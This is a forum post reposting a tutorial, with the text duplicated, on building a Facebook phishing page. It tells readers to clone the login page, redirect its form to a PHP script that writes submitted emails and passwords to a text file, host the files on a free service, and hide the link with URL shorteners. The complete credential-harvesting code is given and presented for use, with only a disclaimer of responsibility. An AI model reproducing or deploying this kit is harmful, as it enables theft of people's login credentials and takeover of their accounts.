1118lakmalkumara
04-29-2010, 01:28 PM
To start, I did not write this tutorial I am just posting it on this site to help it get moving a little bit.:yes:
Okay. Lets start.
:cool:;)
1. Go to the login page of the site http://www.facebook.com/login.php. Right click, and choose "View Page Source"
http://img215.imageshack.us/img215/2773/phishingtut1.png
2. ALOT of text will come up. Right click and hit "Select All" and press [CTRL]+[C] and paste that into Notepad.
http://img223.imageshack.us/img223/609/phishingtut2.png
3.Press [CTRL]+[F] and search for "<form method=" without the quotes. You will find this:
<form method="POST" action="------>
http://img223.imageshack.us/img223/2543/phishingtut3.png
Well, not accually that but, you will need to change it to:
<form method="GET" action="Password.php">
. Save that as Login.php
http://img196.imageshack.us/img196/8390/phishingtut5.png
and lets move on to the password getter. (You can change "Password.php" to whatever you want, as long as you keep the .php.)
http://img216.imageshack.us/img216/8876/phishingtut4.png
4.Now to move onto the code that gets the password. The code for that is:
<?php
header("Location: https://login.facebook.com/login.php?login_attempt=1");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
You can change the change the location, by changing the code a bit.
header("Location: https://login.facebook.com/login.php?login_attempt=1");
Save that as Password.php, or whatever you called it on Login.php, and your almost done!
http://img223.imageshack.us/img223/9752/phishingtut6.png
5. Go to www.ripway.com (http://www.ripway.com/) and sign-up for a free account, and go to "My
Files" and then "Upload Files".
http://img223.imageshack.us/img223/1467/phishingtut7.png
6. Upload both files and You will see this:
http://img196.imageshack.us/img196/9154/phishingtut8.png
Your Phisher is now complete!!:yes:
Just click on the link to test it. (It will automatically create 'passwords.txt')
You should get something like this:
charset_test=�,�,�,�,?,?,?
version=1.0
return_session=0
lsd=864214472
email=d
pass=d
The bottom two lines are what you want!
7 .(OPTIONAL). You can use www.TinyURL.com (http://www.tinyurl.com/) or www.dot.tk (http://www.dot.tk/) to disguise your link!
IF YOU CLICK THE DIRECT LINK FOR 'passwords.txt' AND IT DOESNT SHOW THE NEW PASSWORDS, OR ANYTHING AT ALL, CLICK EDIT UNDER 'passwords.txt'!
REMEMBER:
I am not responsible for what happens to you if you use this information.:P:rolleyes::yes:
Okay. Lets start.
:cool:;)
1. Go to the login page of the site http://www.facebook.com/login.php. Right click, and choose "View Page Source"
http://img215.imageshack.us/img215/2773/phishingtut1.png
2. ALOT of text will come up. Right click and hit "Select All" and press [CTRL]+[C] and paste that into Notepad.
http://img223.imageshack.us/img223/609/phishingtut2.png
3.Press [CTRL]+[F] and search for "<form method=" without the quotes. You will find this:
<form method="POST" action="------>
http://img223.imageshack.us/img223/2543/phishingtut3.png
Well, not accually that but, you will need to change it to:
<form method="GET" action="Password.php">
. Save that as Login.php
http://img196.imageshack.us/img196/8390/phishingtut5.png
and lets move on to the password getter. (You can change "Password.php" to whatever you want, as long as you keep the .php.)
http://img216.imageshack.us/img216/8876/phishingtut4.png
4.Now to move onto the code that gets the password. The code for that is:
<?php
header("Location: https://login.facebook.com/login.php?login_attempt=1");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
You can change the change the location, by changing the code a bit.
header("Location: https://login.facebook.com/login.php?login_attempt=1");
Save that as Password.php, or whatever you called it on Login.php, and your almost done!
http://img223.imageshack.us/img223/9752/phishingtut6.png
5. Go to www.ripway.com (http://www.ripway.com/) and sign-up for a free account, and go to "My
Files" and then "Upload Files".
http://img223.imageshack.us/img223/1467/phishingtut7.png
6. Upload both files and You will see this:
http://img196.imageshack.us/img196/9154/phishingtut8.png
Your Phisher is now complete!!:yes:
Just click on the link to test it. (It will automatically create 'passwords.txt')
You should get something like this:
charset_test=�,�,�,�,?,?,?
version=1.0
return_session=0
lsd=864214472
email=d
pass=d
The bottom two lines are what you want!
7 .(OPTIONAL). You can use www.TinyURL.com (http://www.tinyurl.com/) or www.dot.tk (http://www.dot.tk/) to disguise your link!
IF YOU CLICK THE DIRECT LINK FOR 'passwords.txt' AND IT DOESNT SHOW THE NEW PASSWORDS, OR ANYTHING AT ALL, CLICK EDIT UNDER 'passwords.txt'!
REMEMBER:
I am not responsible for what happens to you if you use this information.:P:rolleyes::yes: